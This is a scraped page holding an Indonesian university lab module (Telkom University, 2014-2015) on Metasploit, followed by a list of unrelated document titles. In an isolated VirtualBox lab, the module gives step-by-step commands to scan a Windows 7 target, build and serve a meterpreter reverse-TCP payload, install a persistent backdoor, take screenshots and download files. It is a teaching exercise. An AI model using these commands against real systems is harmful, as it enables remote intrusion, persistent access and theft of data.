Upload File

jurnal metasploit(revisi)

14
Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 JURNAL PRAKTIKUM Skema Praktikum Komputer Penyerang Komputer Target Sistem Operasi - Ubuntu 12.04 IP Address - 192.168.1.2 Sistem Operasi - Windows 7 IP Address - 192.168.1.4 LANGKAH 1 Persiapkan komputer target 1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1 Centang : Nyalakan Adapter Jaringan Attached to : Jaringan Internal 1

Upload: reza-fahlevi-zulkarnaen

Post on 24-Nov-2015

120 views

Category:

Documents


7 download

Report

TRANSCRIPT

Modul PraktekNetwork Security Keamanan JaringanTelkom University 2014-2015JURNAL PRAKTIKUMSkema PraktikumKomputer PenyerangKomputer Target

Sistem Operasi Ubuntu 12.04IP Address 192.168.1.2 Sistem Operasi Windows 7IP Address 192.168.1.4

LANGKAH 1Persiapkan komputer target1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal

Klik mulai untuk menghidupkan mesin virtual komputer target

2. Non aktifkan firewall pada komputer targetStart > Control Panel > System and Security > Windows Firewall > Costumize Setting >

3. Aktifkan remote Desktop pada komputer targetStart > Control Panel > System and Security > System > Remote settings

4. Setting IP address pada komputer targetStart > Control Panel > Network and Internet > Network and Sharing Center > Local Area Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:IP address: 192.168.1.4Subnet mask: 255.255.255.0Default gateway: 192.168.1.1

LANGKAH 2Persiapkan komputer penyerang1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal

2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang

3. Masuk sebagai rootpraktikum@praktikum:~$ sudo su

4. Setting IP static pada komputer penyerang melalui root@praktikum:~# nano /etc/network/interfaces

Ubah isi file menjadi berikut :auto lo iface lo inet loopback

auto eth0iface eth0 inet loopbackaddress 192.168.1.3netmask 255.255.255.0network 192.168.1.0gateway 192.168.1.1broadcast 192.168.1.255

Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor 5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasiroot@praktikum:~# /etc/init.d/networking restart

LANGKAH 3Melakukan scanning dengan nmap1. Lakukan foot printing untuk mendapatkan informasi sistem targetroot@praktikum:~# nmap sS O 192.168.1.1/24 192.168.1.255/24

Output dari perintah diatas :

LANGKAH 4Uji koneksi dari komputer penyerang ke komputer target :root@praktikum:~$ ping 192.168.1.4

Output dari perintah diatas :

LANGKAH 5Pastikan apache2 dalam keadaan aktifroot@praktikum:~#/etc/init.d/apache2 restart

LANGKAH 6Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan metasploit1. Membuat payload di komputer penyerang untuk komputer target root@praktikum:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe msfconsole

Output dari perintah diatas: 2. Ketik msfconsole untuk memulai metasploit msroot@praktikum:~# msfconsole

3. Pilih payload yang sesuai dengan tujuan komputer targetmsf > use exploit/multi/handler

4. setting payload yang tepat dari sesuai dengan tujuan exploitasimsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

5. Masukan IP komputer penyerang kedalam konfigurasi

Masukan port sesuai yang direncanakan pada pembuatan backdoormsf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 666

6. Lakukan exploitasi msf exploit(handler) > exploit

7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target, masukan URL: http://192.168.1.2/praktikum.exe Klik run

Klik run

8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap instalasi backdoor, baca informasi sistem komputer targetmeterpreter > sysinfo

Output dari perintah diatas:

9. Periksa IP Address pada komputer targetmeterpreter > ifconfig

Output dari perintah diatas:

10. Instalasi backdoor pada komputer penyerang terhadap komputer targetmeterpreter >run persistence U -i 5 p 1037 r 192.168.1.2

Catatan : 1037 adalah port yang terbuka tetapi belum digunakanOutput dari perintah diatas:

Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang 11. Keluar dari aktifitas exploitasimeterpreter > exit

12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.msf exploit(handler) > set LPORT 1037

13. Lakukan exploitasi msf exploit(handler) > exploit

secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target14. Melihat perintah yang tersedia pada meterpretermeterpreter > help

15. Lakukan screenshoot komputer targetmeterpreter > screenshot

buka hasil screenshoot diatas, berikut lokasi penyimpanan

16. Melihat posisi direktori saat inimeterpreter > pwd

Outputnya

Jika ingin pindah ke direktori yang lain, contoh :meterpreter > cd D:/

17. Download file pada komputer target meterpreter > download namafile

contoh :

Maka file akan tersimpan pada direktori dimana msfconsole dimulai 18. Lakukan restart mesin targetmeterpreter > reboot

1


Artikel Jurnal Revisi 11mei 2008

Jurnal Mata Revisi

Revisi Artikel Jurnal Agama Islam 2011 - blogs.unpad.ac.idblogs.unpad.ac.id/paiarabunpad/files/2012/07/Artikel-Jurnal... · Pendidikan Agama Islam di Perguruan Tinggi Umum”. Tujuan

REVISI KODE ETIK AKUNTAN INDONESIA REVISI KODE ETIK

Bbm Jurnal Belajar Revisi Acasia

Jurnal Reading Blok 4 (Revisi)

Jurnal Awal Gel Klp 2 Gel 1 Revisi

JURNAL REVISI 2

Jurnal metasploit(revisi)

Tingkah Laku Makan Rusa Jawa-revisi-jurnal

Basic Metasploit

REVISI RENCANA STRATEGIS (REVISI RENSTRA) TAHUN 2010-2015

JURNAL SITTI,revisi (02-25-13-03-29-53)

Jurnal Topik Baru Paling New Revisi Terbaru 11

JURNAL ILMIAH AKUNTANSI DAN EKONOMI - lppm.usni.ac.idlppm.usni.ac.id/jurnal/1. REVISI BU INDIRA ( 1-19 ) LIABILITAS VOL... · dan informasi penelitian atau aplikasi penelitian dan

Isi Dk Revisi Tgl 01 Revisi Tgl 9 April

REVISI MPKP

DRAFT REVISI KUESIONER TRACER STUDY UNSYIAH (REVISI)

K15--1-01 Hypergraph Partitioning-Revisi STIKaqwamrosadi.staff.gunadarma.ac.id/Publications/files/2983/Jurnal... · Kata Kunci : Web Sistem Pakar, Psikiatri, Kejiwaan, Gangguan Jiwa

Jurnal Potensi Ekonomi TangSel(Edisi Revisi)

Tambahn Jurnal Lagi (Revisi Dari Filenya Nining)

Revisi Jurnal Translate Siap Print !!!

jurnalkommas.comjurnalkommas.com/docs/Jurnal 2015 tanti (3).docx (revisi... · Web viewmurni. Namun demikian perusahaan harus memahami dalam mengkomunikasikan perusahaannya kepada

Jurnal INFORMATIKA · JURNAL INFORMATIKA, Vol.5 No.1 April 2018, pp.34~42 ISSN: 2355-6579 E-ISSN: 2528-2247 34 Diterima 25 September 2017; Revisi 14 Januari 2018; Disetujui 17 Januari

iepc-chiapas.org.mxiepc-chiapas.org.mx/prep2018/descargas/informe_auditoria.pdf · para el pentest: OWASPZAP 2.7, Amap, Metasploit, Dmitry, Grabber y SQLmap, hping3, SlowHttpTest

Simulasi Penyerangan Phising Dengan MITM Dan Metasploit

2010 Mei Revisi Artikel Jurnal SD_Purwanta

1. Bbm Jurnal Belajar Revisi Acasia

fkip.uniska-bjm.ac.idfkip.uniska-bjm.ac.id/.../10/KKNI-BK-REVISI-KODE-MK-…  · Web viewTerampil mempublikasikan karya ilmiah melalui jurnal penelitian, ... teori belajar behaviorisme,

Revisi Pedoman TugasAkhir Edisi Revisi 2014

04 193-208 jurnal perangkat lunak stp revisi-revieweprints.binadarma.ac.id/2611/1/file Jurnal e-print alex.pdf · 2016. 2. 1. · -xuqdo ,opldk 0$75,. 9ro 1r 'hvhpehu ehuxvdkd xqwxn

 · (fotocopy abstrak/jurnal penelitian) Mohon disediakan Materi Workshop Revisi Kurikulum yang disampaikan oleh narasumber, notulensi workshop revisi kurikulum, absen peserta dan

KTSP 2014 Revisi 2014 Smp 1 Skh REVISI(2)

Langkah-Langkah Publikasi Jurnal Internasional · Membuat cover letter / letter to the editor ... Revisi Major : menambah data, memperbaiki analisa statistik. Submit Revised Manuskrip

Tutorial Hacking Dengan Metasploit